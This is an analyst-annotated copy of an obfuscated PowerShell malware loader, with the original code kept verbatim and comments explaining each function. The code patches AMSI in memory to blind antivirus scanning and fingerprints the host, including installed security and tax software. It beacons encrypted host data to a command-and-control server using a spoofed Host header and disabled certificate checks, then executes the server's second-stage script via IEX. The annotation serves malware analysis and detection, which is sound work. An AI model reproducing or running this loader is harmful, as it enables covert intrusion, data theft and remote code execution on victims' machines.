# ---------------------------------------------------------------------------
# ANALYST ANNOTATION of an obfuscated PowerShell loader/beacon (gist posted
# 2020-06-03). Code is kept byte-for-byte as posted; only comments were added
# so the sample stays usable as an artifact. Do not execute outside an
# isolated analysis VM: it disables TLS validation, patches AMSI and runs
# whatever script the server returns via IEX.
#
# Stages, in execution order (the main sequence is at the bottom of rsrzis):
#   1. on CLR 4+, patch AmsiScanBuffer in amsi.dll so scanning fails (uydt);
#   2. derive a bot id = MD5(user + host + BIOS serial) (pdwkvsj) and send it
#      RC4-encrypted/base64 in a Cookie header prefixed "winloud:";
#   3. POST a first beacon "act%pall|p%<admin>|ver%p18|pcn%<ps major>", then,
#      when the reply ends in '0', a full host fingerprint "act%fall|inf%..."
#      assembled by xpylubsk (user, adapters, OS, screen, CPU, RAM, AV, VM);
#   4. IEX the returned script (second stage), then scrub config keys.
# Transport per request: UTF-8 -> RC4 (wlc2, hard-coded key) -> base64 ->
# 'jsen=' prefix -> Deflate -> HTTPS POST. Reply: base64 -> inflate -> RC4.
# The real C2 base URL appears to have been replaced by the poster with the
# placeholder "https://was/encoded/URL".
#
# Network/host indicators visible in this listing: Cookie "winloud:<b64>",
# Host header forced to ocsp.verisign.com while SNI/DNS still show the real
# host, Referer to a google.com search, Firefox/34.0 user agent, URL path
# /N3203/adj/amzn.us.sr/<5-8 letters>.(jsp|asp|js), Add-Type compilation of
# a class importing LoadLibrary/GetProcAddress/VirtualProtect, and
# ServerCertificateValidationCallback set to a constant.
# Identifiers are random; each function below is labelled with its role.
# ---------------------------------------------------------------------------
function rsrzis {
# Assemblies referenced later (crypto/collections); results discarded.
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
# Hide non-terminating errors for the whole run so failing WMI/registry
# probes never surface to the user.
$ErrorActionPreference = "SilentlyContinue";
# wlc2: plain RC4. First parameter = data bytes (copied, so the caller's
# array is untouched); second = key bytes. The first loop initialises S and
# repeats the key to 256 bytes, the second is the key-scheduling swap, the
# third is the PRGA XOR over the data. Symmetric, so bucrom/mrhgqoa19e use
# it for both directions. The key is the constant 'vftimreqs' in the config
# hashtable, so captured beacons can be decrypted offline with this routine.
function wlc2 {
param([Byte[]]$mfvoiqhn_12tkvf,[Byte[]]$gibqokxyxbupwcsrtuvm_41nhwrp)
[Byte[]]$eplkztikdybroisgypg9qdbjfhmi = New-Object Byte[] $mfvoiqhn_12tkvf.Length;$mfvoiqhn_12tkvf.CopyTo($eplkztikdybroisgypg9qdbjfhmi, 0);[Byte[]]$s = New-Object Byte[] 256;[Byte[]]$k = New-Object Byte[] 256;
for ($i = 0; $i -lt 256; $i++){$s[$i] = [Byte]$i;$k[$i] = $gibqokxyxbupwcsrtuvm_41nhwrp[$i % $gibqokxyxbupwcsrtuvm_41nhwrp.Length];}
$j = 0;for ($i = 0; $i -lt 256; $i++){$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;};$i = $j = 0;
for ($x = 0; $x -lt $eplkztikdybroisgypg9qdbjfhmi.Length; $x++){$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;[int]$t = ($s[$i] + $s[$j]) % 256;$eplkztikdybroisgypg9qdbjfhmi[$x] = $eplkztikdybroisgypg9qdbjfhmi[$x] -bxor $s[$t];}
return $eplkztikdybroisgypg9qdbjfhmi
}
# inwh-rsf: display names of registered antivirus products, ';'-separated,
# read from the local root\SecurityCenter2 WMI namespace (the -ComputerName
# is always the local machine). Returns "N/A" when nothing is found or the
# query throws (SecurityCenter2 is typically absent on server SKUs).
function inwh-rsf {
try {
# $e is not initialised; each name is appended with a ';' and the trailing
# separator is trimmed below.
Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct -ComputerName $env:computername | % { $e += $_.displayName + ';'}
if ($e){
$e[0..($e.Length-2)]-join''
}else{
"N/A"
}
}
catch {"N/A"}
finally{[GC]::Collect()}
}
# gic-jadkdp: installed-software scan. Walks HKLM\SOFTWARE(\Wow6432Node)\
# ...\Uninstall on each target via the remote-registry API and emits every
# DisplayName matching $NameRegex. The default regex targets browsers, US tax
# preparation software (TAX, OLT, Lacerte, ProSeries), security products and
# point-of-sale software -- a profile consistent with financial-sector
# targeting. Not invoked anywhere in this listing; presumably reserved for
# the second stage. Each hit is emitted as "<name>;" ($str is reset per app,
# so it never accumulates).
function gic-jadkdp {
param (
[Parameter(ValueFromPipeline=$true)]
[string[]]$ComputerName = $env:COMPUTERNAME,
[string]$NameRegex = '(Opera|Firefox|Chrome|TAX|OLT|LACERTE|PROSERIES|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|Protect|Point of Sale|POS)'
)
foreach ($comp in $ComputerName) {
# '' = native hive, '\Wow6432Node' = 32-bit software on 64-bit Windows.
$gibqokxyxbupwcsrtuvm_41nhwrps = '','\Wow6432Node'
foreach ($gibqokxyxbupwcsrtuvm_41nhwrp in $gibqokxyxbupwcsrtuvm_41nhwrps) {
try {
$apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$gibqokxyxbupwcsrtuvm_41nhwrp\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
} catch {
continue
}
foreach ($app in $apps) {
$program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$gibqokxyxbupwcsrtuvm_41nhwrp\Microsoft\Windows\CurrentVersion\Uninstall\$app")
$name = $program.GetValue('DisplayName')
$str = ''
if ($name -and $name -match $NameRegex) {
$str += $name + ';'
$str
}
}
}
}
}
# xpylubsk: full host fingerprint for the "act%fall" beacon. Builds a '|'
# separated record, then re-emits it as "inf%<field>|inf%<field>|...".
# Field order: domain, user, machine, adapter list, OS caption, SYSTEM/admin
# flag, screen WxH, process name, PID, PowerShell major, OS architecture,
# time zone, uptime, CPU names, version tag 'p18', RAM (GB), AV products,
# VM flag. Everything comes from [Environment], WMI and the helpers below.
function xpylubsk {
$str = [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName;
$string = ""
# One entry per connected adapter: the values id/ip/mac/name joined by ';'
# (elq-zjb); consecutive adapters are concatenated with no separator.
foreach($c in lwo-iqotwsu){
[string]$lanname = $c.Name; [string]$macadr = $c.MAC; [string]$ID = $c.ID
# Dead statement: references an undefined $p and is overwritten on the next
# line. Looks like an abandoned fix for the single-address case, where
# $c.IP is a plain string and [0] yields its first character, not the address.
$ip = @{$true=$c.IP[0];$false=$p.IP}[$c.IP.Length -lt 6];
[string]$ip = $c.IP[0]; if(!$ip -or $ip.trim() -eq '') {$ip='0.0.0.0'};
$lanconf = @{
id = $ID
ip = $ip;
mac = $macadr;
name = $lanname;
}
$string += elq-zjb $lanconf
}
$str += "|$string";
$str += '|' + $(Get-WmiObject -class Win32_OperatingSystem).Caption
# Running as SYSTEM reports 'True' directly; otherwise the admin check.
if(([Environment]::UserName).ToLower() -eq "system"){
$str += '|True'
}
else{
$str += '|'+ $(bgf-uftc)
}
[void] [Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
# Only the last enumerated screen's size survives the loop.
$Screens = [system.windows.forms.screen]::AllScreens
foreach ($Screen in $Screens) {
$Width = $Screen.Bounds.Width
$Height = $Screen.Bounds.Height
}
$str += '|' + "$Width`x$Height"
# Host process (e.g. powershell.exe vs. an injected host) and its PID.
$n = [System.Diagnostics.Process]::GetCurrentProcess()
$str += '|'+ $n.ProcessName+'|'+$n.Id
$str += '|' + $PSVersionTable.PSVersion.Major
$str += '|' + (Get-WmiObject -class Win32_OperatingSystem).OSArchitecture
$str += '|' + (gwmi win32_timeZone -ComputerName $env:ComputerName).caption
$str += '|' + $(gb-frlg)
$str += '|' + $(dlvjj-klyzm)
$str += '|' + $yiklq5hlez['iluopvxhypju']
$str += '|' + ([Math]::Round((Get-WmiObject -Class win32_computersystem).TotalPhysicalMemory/1Gb)).toString()
$str += '|' + $(inwh-rsf)
$str += '|' + $(dfiou)
# Re-tag every field with the "inf%" marker and drop the trailing '|'.
$str.split('|') |% {$e += "inf%$_|"}
$e[0..($e.Length-2)]-join''
}
$j={$t=$args;[string](0..$t[0]|%{[char][int]([int][char]('&')+($t[1]).substring(($_*$t[2]),$t[2]))})-replace' '};
# $yiklq5hlez: the loader's configuration. Keys added at runtime elsewhere:
# 'quj' (Cookie value), 'scr' (second-stage script text) and 'udoeanwrgws'
# (32-char tail of the server reply). Several keys are removed again after
# the second stage runs; the remainder is handed to orp-cjgwnnk.
$yiklq5hlez = @{
# C2 base URL. This value looks like a redaction placeholder left by the
# poster rather than the original address.
aobh = "https://was/encoded/URL";
# RC4 key for every beacon and reply.
vftimreqs = 'b[CgNFd8=s9isYsBcX6|PJ+A~w?#LEKH';
# Fixed, outdated user agent (Firefox 34 on Windows 8.1) -- easy to fingerprint.
fezcrocp = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.1) Gecko/20100101 Firefox/34.0';
bekeqc = 'text/html; charset=utf-8'
# Spoofed HTTP Host header; DNS and TLS SNI still carry the real C2 host.
ficfz = 'ocsp.verisign.com';
# Decoy Referer so the POST looks like a click-through from a search.
nbducyg = 'https://www.google.com/search?ei=u_kwegrR5tZPu';
# URI path prefix; a random "<letters>.<jsp|asp|js>" file name is appended.
hnaofzluerdjb = '/N3203/adj/amzn.us.sr/';
dxnhecwgky = [System.Text.Encoding]::UTF8;
# POST body prefix placed before the base64 blob.
pref = 'jsen=';
# Loader version tag reported in both beacons.
iluopvxhypju = 'p18'
}
# bucrom: encrypt for the wire -- UTF-8 encode the string, RC4 it with the
# config key, return base64. Inverse of mrhgqoa19e.
function bucrom {
param([string]$mfvoiqhn_12tkvf)
[Convert]::ToBase64String($(wlc2 $yiklq5hlez['dxnhecwgky'].GetBytes($mfvoiqhn_12tkvf) $yiklq5hlez['dxnhecwgky'].GetBytes($yiklq5hlez['vftimreqs'])))
}
# lwo-iqotwsu: one object (Name, IP, MAC, ID) per network adapter whose
# NetConnectionStatus is 2 ("Connected"). IP is whatever the associated
# Win32_NetworkAdapterConfiguration.IPAddress expands to -- an array when
# the adapter has several addresses, a single string when it has one.
function lwo-iqotwsu {
Get-WmiObject Win32_NetWorkAdapter -Filter 'NetConnectionStatus=2' |
ForEach-Object {
$duepjx39 = 1 | Select-Object Name, IP, MAC, ID
$duepjx39.Name = $_.Name
$duepjx39.MAC = $_.MacAddress
$duepjx39.ID = $_.DeviceID
$config = $_.GetRelated('Win32_NetWorkAdapterConfiguration')
$duepjx39.IP = $config | Select-Object -expand IPAddress
$duepjx39
}
}
# mrhgqoa19e: decrypt from the wire -- base64 decode, RC4 with the config
# key, UTF-8 decode. Inverse of bucrom; applied to every server reply.
function mrhgqoa19e {
param([string]$mfvoiqhn_12tkvf)
$yiklq5hlez['dxnhecwgky'].GetString($(wlc2 $([System.Convert]::FromBase64String($mfvoiqhn_12tkvf)) $yiklq5hlez['dxnhecwgky'].GetBytes($yiklq5hlez['vftimreqs'])))
}
# kuf_pgwnmrvfs: one HTTPS POST beacon. $args[0] is the body text (already
# 'jsen=' + base64/RC4 from the caller); it is Deflate-compressed before
# sending. Returns the reply decoded by cyrokiut-qecjtgoas12 (the second
# line when the reply has several lines), or nothing at all on any
# exception -- the catch discards the message, so a blocked beacon is silent.
function kuf_pgwnmrvfs {
$eplkztikdybroisgypg9qdbjfhmi = $(mxaz-somybiwzxuqy6 $yiklq5hlez['dxnhecwgky'].GetBytes($args[0]))
try{
# Accept any server certificate (the callback always returns 1): a
# self-signed C2 cert or an interception proxy will not stop the beacon.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={1};
# Mixed-case type name is cosmetic obfuscation; turns off "Expect: 100-continue".
[SysTEm.Net.SeRvICePoIntMAnaGEr]::Expect100ConTINuE=0;
# URL = base + path prefix + <5..8 random lowercase letters>.<jsp|asp|js>,
# so no two beacons share a file name (Get-Random's -Maximum is exclusive).
$urr = $($yiklq5hlez['aobh'] + $yiklq5hlez['hnaofzluerdjb'] + $($u={sal er Get-Random;$(-join(1..$(er -Minimum 5 -Maximum 9)|%{[char][int]((65..90)+(97..122)|er)})).ToLower()};'{0}.{1}' -f $(. $u), $(@('jsp','asp','js')| Get-Random)))
[System.Net.HttpWebRequest] $xghopk = [System.Net.WebRequest]::Create($urr)
# Use the system proxy with the current user's credentials, so the beacon
# also works from behind an authenticating corporate proxy.
$xghopk.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$xghopk.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
# Ten-minute timeout.
$xghopk.Timeout = 600000;
$xghopk.Method = 'POST'
$xghopk.UserAgent = $yiklq5hlez['fezcrocp']
# HttpWebRequest.Host is a .NET 4 API, hence the CLR check: on CLR 4+ the
# Host header is overwritten with the decoy value from the config.
if($PSVersionTable.CLRVersion.Major -gt 3){$xghopk.Host = $yiklq5hlez['ficfz']}
# Cookie carries the bot id ("winloud:" + RC4/base64 of the MD5 from pdwkvsj).
$xghopk.Headers.Add('Cookie', $yiklq5hlez['quj'])
$xghopk.ContentType = $yiklq5hlez['bekeqc']
$xghopk.Referer = $yiklq5hlez['nbducyg']
$xghopk.ContentLength = $eplkztikdybroisgypg9qdbjfhmi.Length
$hikebe = $xghopk.GetRequestStream()
$hikebe.Write($eplkztikdybroisgypg9qdbjfhmi, 0, $eplkztikdybroisgypg9qdbjfhmi.Length)
$hikebe.Flush()
$hikebe.Close()
[System.Net.HttpWebResponse] $prjryn = $xghopk.GetResponse()
$cbenfq60 = New-Object System.IO.StreamReader($prjryn.GetResponseStream())
$res = $cbenfq60.ReadToEnd()
$prjryn.Close()
if ($res) {
# Reply is base64 + Deflate; decoded line by line. With more than one
# line only the second is returned.
$duepjx39 = $(cyrokiut-qecjtgoas12 $($res))
if($duepjx39.count -gt 1){$duepjx39[1]}else{$duepjx39}
}}
catch {$_.Exception.Message|Out-Null}
finally{[GC]::Collect();}
}
# Write-Log: not referenced anywhere in this listing. Looks like filler
# lifted from a benign module to dilute heuristics. Note it ignores its
# $streamWriter parameter and writes to $global:streamWriter instead, so it
# would fail unless that global exists.
Function Write-Log {
[CmdletBinding()]
Param ([Parameter(Mandatory=$true)][string]$streamWriter, [Parameter(Mandatory=$true)][string]$infoToLog)
Process{
$InfoMessage = "$([DateTime]::Now) [INFO] $infoToLog"
$global:streamWriter.WriteLine($InfoMessage)
Write-Host $InfoMessage -ForegroundColor Cyan
}
}
# Get-ConsoleColor: enumerates the ConsoleColor enum as objects. Never
# called here; more benign-looking filler (see Write-Log, Test-ModuleFunction).
function Get-ConsoleColor
{
[CmdletBinding()]
param(
)
Begin{
}
Process{
$Colors = [Enum]::GetValues([ConsoleColor])
foreach($Color in $Colors)
{
[pscustomobject] @{
ConsoleColor = $Color
}
}
}
End{
}
}
# dfiou: virtual-machine check from Win32_BIOS (version, serial) and
# Win32_ComputerSystem (manufacturer, model). Only a [bool] is returned;
# the hashtable/PSObject built along the way is never used, $computer is
# undefined (ComputerName ends up $null) and $resulatas is written but
# never read -- leftovers from the snippet this was lifted from.
# Unlike the other probes, -ErrorAction Stop makes a WMI failure here a
# terminating error, and nothing up the stack catches it.
function dfiou
{
$wmibios = Get-WmiObject Win32_BIOS -ErrorAction Stop | Select-Object version,serialnumber
$wmisystem = Get-WmiObject Win32_ComputerSystem -ErrorAction Stop | Select-Object model,manufacturer
$dnhcak17 = @{
ComputerName = $computer
BIOSVersion = $wmibios.Version
SerialNumber = $wmibios.serialnumber
Manufacturer = $wmisystem.manufacturer
Model = $wmisystem.model
dfiou = $false
VirtualType = $null
}
# A serial containing "VMware" decides immediately; otherwise the BIOS
# version is matched. Only '*Xen*' is a real wildcard -- 'VIRTUAL' and
# 'A M I' must equal the whole string ('A M I' may also appear on physical
# AMI firmware, so that branch can misclassify real hardware).
if ($wmibios.SerialNumber -like "*VMware*") {
$dnhcak17.dfiou = $true
$dnhcak17.VirtualType = "Virtual - VMWare"
}
else {
switch -wildcard ($wmibios.Version) {
'VIRTUAL' {
$dnhcak17.dfiou = $true
$dnhcak17.VirtualType = "Virtual - Hyper-V"
}
'A M I' {
$dnhcak17.dfiou = $true
$dnhcak17.VirtualType = "Virtual - Virtual PC"
}
'*Xen*' {
$dnhcak17.dfiou = $true
$dnhcak17.VirtualType = "Virtual - Xen"
}
}
}
# Second pass on manufacturer/model when the BIOS gave nothing.
if (-not $dnhcak17.dfiou) {
if ($wmisystem.manufacturer -like "*Microsoft*")
{
$dnhcak17.dfiou = $true
$dnhcak17.VirtualType = "Virtual - Hyper-V"
}
elseif ($wmisystem.manufacturer -like "*VMWare*")
{
$dnhcak17.dfiou = $true
$dnhcak17.VirtualType = "Virtual - VMWare"
}
elseif ($wmisystem.model -like "*Virtual*") {
$dnhcak17.dfiou = $true
$dnhcak17.VirtualType = "Unknown Virtual Machine"
}
}
$resulatas += New-Object PsObject -Property $dnhcak17
return $dnhcak17.dfiou
}
# bgf-uftc: $true when the current token is in the built-in Administrators
# role (i.e. an elevated/admin context). Drives the p%0/p%1 flag in the
# first beacon and the admin field of the fingerprint.
function bgf-uftc
{
$tx = [Security.Principal.WindowsIdentity]::GetCurrent();
(New-Object Security.Principal.WindowsPrincipal $tx).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
}
# elq-zjb: join a hashtable's values with ';' (keys are dropped). Used for
# the per-adapter id/ip/mac/name record. @{} is an unordered Hashtable, so
# the order of the values in the output is not guaranteed to match the
# order they were declared in.
function elq-zjb($ht) {
$first = $true
foreach($pair in $ht.GetEnumerator()) {
if ($first)
{
$first = $false
}
else
{
$output += ';'
}
$output+="{0}" -f $($pair.Value)
}
$output
}
# syw-alzdl: split a decrypted server reply into the config. The last
# character is discarded; the 32 characters before it go to 'udoeanwrgws'
# (some token/id -- role not visible here) and everything before those 32
# goes to 'scr', the script text later passed to IEX.
function syw-alzdl {
param([string]$out)
$yiklq5hlez.add('udoeanwrgws', $($out[($out.length-33)..($out.length-2)]-join ''))
$yiklq5hlez.add('scr', $($out[0..($out.length-34)]-join ''));
}
# mxaz-somybiwzxuqy6: raw Deflate-compress $args[0] (a byte array) and
# return the compressed bytes. Applied to every POST body. 'no' is an alias
# for New-Object, set to break simple string matching on the cmdlet name.
# Errors are swallowed, in which case nothing is returned.
function mxaz-somybiwzxuqy6
{
try{
sal no New-Object;
[System.IO.MemoryStream] $rascugbd240_swv = no System.IO.MemoryStream
$Deflate = no System.IO.Compression.DeflateStream $rascugbd240_swv, ([IO.Compression.CompressionMode]::Compress)
$Deflate.Write($args[0], 0, $args[0].Length );$Deflate.Close();$rascugbd240_swv.Close()
$rascugbd240_swv.ToArray()
}
catch {$_.Exception.Message|Out-Null}
finally{[GC]::Collect();[GC]::WaitForPendingFinalizers();}
}
# dlvjj-klyzm: processor names from Win32_Processor, ';'-separated with the
# trailing separator trimmed; "N/A" if the query throws. Same $e-accumulator
# pattern as inwh-rsf.
function dlvjj-klyzm {
try {
Get-WmiObject -Namespace "root\CIMV2" -Class Win32_Processor -ComputerName $env:computername | % { $e += $_.Name + ';'}
$e[0..($e.Length-2)]-join''
}
catch {"N/A"}
finally{[GC]::Collect()}
}
# pdwkvsj: bot identifier = lowercase hex MD5 of lower(username +
# machine name + BIOS serial number). Stable across reboots and sessions for
# the same user on the same hardware, which is what the C2 keys on. Sent
# encrypted in the Cookie header of every beacon.
function pdwkvsj {
$HashName = "MD5"
[string]$ret = ""
$hd = gwmi win32_bios
$ret = $hd["SerialNumber"].ToString()
[string]$String = $([Environment]::UserName +[Environment]::MachineName + $ret).ToLower();
$StringBuilder = New-Object System.Text.StringBuilder
[System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{
[Void]$StringBuilder.Append($_.ToString("x2"))
}
$StringBuilder.ToString().ToLower()
}
# uydt: in-memory AMSI bypass. Compiles a C# class with Add-Type (on Windows
# PowerShell this invokes csc.exe and leaves temp files -- a detection
# opportunity) that resolves AmsiScanBuffer in amsi.dll via
# LoadLibrary/GetProcAddress, sets the page to PAGE_EXECUTE_READWRITE
# (0x40) with VirtualProtect and overwrites the function's first bytes:
#   x64 (oul66): B8 57 00 07 80 C3    = mov eax,0x80070057 ; ret
#   x86 (ayy56): B8 57 00 07 80 C2 18 00 = mov eax,0x80070057 ; ret 0x18
# 0x80070057 is E_INVALIDARG, so every subsequent AMSI scan in this process
# reports an error and script content is no longer inspected. The DLL and
# export names are assembled from fragments ("a"+"ms"+"i.d"+"ll",
# "Am"+"s"+"iSca"+"nBuf"+"fer") to defeat static string matching, and the
# P/Invoke entry points are renamed. gofgobxy is void, so $ptr stays $null.
# Caller only runs this when $PSVersionTable.CLRVersion.Major -gt 3.
function uydt {
try{
# 'grsfqcnzf' is an alias for Add-Type.
sal grsfqcnzf Add-Type ;
$dpa3 = @"
using System;
using System.Runtime.InteropServices;
public class kwyv
{
[DllImport("kernel32", EntryPoint = "GetProcAddress")]
static extern IntPtr xwnou(IntPtr hModule, string procName);
[DllImport("kernel32", EntryPoint = "LoadLibrary")]
static extern IntPtr pekaon(string name);
[DllImport("kernel32", EntryPoint = "VirtualProtect")]
static extern bool gdtxpgf(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
static byte[] oul66 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
static byte[] ayy56 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
public static void gofgobxy()
{
if (qsdzsh47())
Patchkwyv(oul66);
else
Patchkwyv(ayy56);
}
private static void Patchkwyv(byte[] qrlos49)
{
try
{
var zjr = "i.d";
var nvl2 = "a";
var qoa19 = "ll";
var hiww1 = "ms";
var agarmj2 = pekaon(nvl2 + hiww1 + zjr + qoa19);
if (agarmj2 == IntPtr.Zero)
{
return;
}
var dvipz2 = "nBuf";
var hkoxyur4 = "Am";
var qel29 = "s";
var srm36 = "fer";
var pjd46 = "iSca";
var ycou46 = xwnou(agarmj2, hkoxyur4 + qel29 + pjd46 + dvipz2 + srm36);
if (ycou46 == IntPtr.Zero)
{
return;
}
uint oldProtect;
gdtxpgf(ycou46, (UIntPtr)qrlos49.Length, 0x40, out oldProtect);
Marshal.Copy(qrlos49, 0, ycou46, qrlos49.Length);
}
catch (Exception e)
{
Console.WriteLine(" [x] {0}", e.Message);
Console.WriteLine(" [x] {0}", e.InnerException);
}
}
private static bool qsdzsh47()
{
bool qsdzsh47 = true;
if (IntPtr.Size == 4)
qsdzsh47 = false;
return qsdzsh47;
}
}
"@
# Compile and run the patch; qsdzsh47 picks the x64 stub unless IntPtr is 4 bytes.
grsfqcnzf $dpa3
$ptr = [kwyv]::gofgobxy()
}catch {$_.Exception.Message}
}
if ($PSVersionTable.CLRVersion.Major -gt 3) {uydt}
# cyrokiut-qecjtgoas12: decode a server reply -- base64 decode, inflate
# (raw Deflate), emit the result line by line. The while condition stops at
# the first empty line as well as at end of stream, so only the leading
# non-empty lines are ever returned. 'np' aliases New-Object. Errors are
# swallowed (nothing returned).
function cyrokiut-qecjtgoas12 {
try{
[byte[]] $mfvoiqhn_12tkvf = [System.Convert]::FromBase64String($args[0])
sal np New-Object;
$ms = np System.IO.MemoryStream
$ms.Write($mfvoiqhn_12tkvf, 0, $mfvoiqhn_12tkvf.Length);
$ms.Seek(0,0);
$sr = np System.IO.StreamReader(np System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
while ($line = $sr.ReadLine()) {$line}
}
catch {$_.Exception.Message|Out-Null}
finally{[GC]::Collect();[GC]::WaitForPendingFinalizers()}
}
# Test-ModuleFunction: never called here, and it references
# Get-CallerPreference, a helper from public modules that is not present in
# this listing. Filler, like Write-Log and Get-ConsoleColor.
function Test-ModuleFunction
{
[CmdletBinding()]
param ( )
begin
{
Get-CallerPreference -Cmdlet $PSCmdlet -SessionState $ExecutionContext.SessionState
}
}
# gb-frlg: host uptime as "<d>d:<h>h:<m>m:<s>s", computed from
# Win32_OperatingSystem.LastBootUpTime (WMI datetime converted via
# ManagementDateTimeConverter). One field of the fingerprint.
function gb-frlg {
$gwiaxv29 = [System.Management.ManagementDateTimeconverter]::ToDateTime("$((gwmi Win32_OperatingSystem).LastBootUpTime)")
$uptime = (Get-Date) - $gwiaxv29
return (($uptime.days).ToString()+"d:"+($uptime.hours).ToString()+"h:"+$uptime.minutes.ToString()+"m:"+($uptime.seconds).ToString()+"s")
}
# ---- main sequence --------------------------------------------------------
# Cookie value: "winloud:" + base64(RC4(bot id)). The constant prefix on
# every request is the most reliable network indicator in this sample.
$yiklq5hlez.add('quj', 'winloud:' + $(bucrom $(pdwkvsj)));
# Privilege flag for the beacon: p%1 if in the Administrators role, else p%0.
if(bgf-uftc){$eb='p%1'}else{$eb='p%0'}
# First beacon: "act%pall|p%<0|1>|ver%p18|pcn%<PS major>" -> RC4 -> base64,
# 'jsen=' prefix, Deflate, POST. The reply is base64+inflate decoded, then
# RC4-decrypted. If the POST failed, kuf_pgwnmrvfs returns nothing and $de
# is empty, in which case everything below degrades to no-ops.
$de = mrhgqoa19e $(kuf_pgwnmrvfs $($($yiklq5hlez['pref'] + $(bucrom $('act%pall|'+ $eb + '|ver%'+ $yiklq5hlez['iluopvxhypju'] + '|pcn%' + $PSVersionTable.PSVersion.Major)))))
# The last character of the decrypted reply is the server's verdict.
$k=$de[$de.length-1] -join ''
# '0' (the int is coerced to the string '0' for the comparison) -> send the
# full fingerprint "act%fall|" + xpylubsk output and keep that reply,
# presumably a registration step; otherwise keep the first reply. Either
# way syw-alzdl splits the reply into 'scr' (script) and a 32-char tail.
if ($k -eq 0) {syw-alzdl $(mrhgqoa19e $(kuf_pgwnmrvfs $($yiklq5hlez['pref'] + $(bucrom $('act%fall|'+ $(xpylubsk))))))}else{syw-alzdl $de}
# Second stage: the server-supplied script runs in this scope with no
# integrity check of any kind. All further capability lives in that script.
IEX $yiklq5hlez['scr'];
# Anti-forensics: drop key, prefix, version tag, encoder and script text
# from the config, clear $Error and force a GC so memory captures carry less.
$de=$null;$yiklq5hlez.Remove('pref');$yiklq5hlez.Remove('vftimreqs');$yiklq5hlez.Remove('iluopvxhypju');$yiklq5hlez.Remove('dxnhecwgky');$yiklq5hlez.Remove('scr')
$Error.Clear()
[GC]::Collect()
[GC]::WaitForPendingFinalizers()
# Not defined in this listing; presumably provided by the IEX'd stage. It
# receives what is left of the config (URL, UA, headers, Cookie, 32-char tail).
orp-cjgwnnk $yiklq5hlez
}
# Entry point: everything above is wrapped in one function and run once.
rsrzis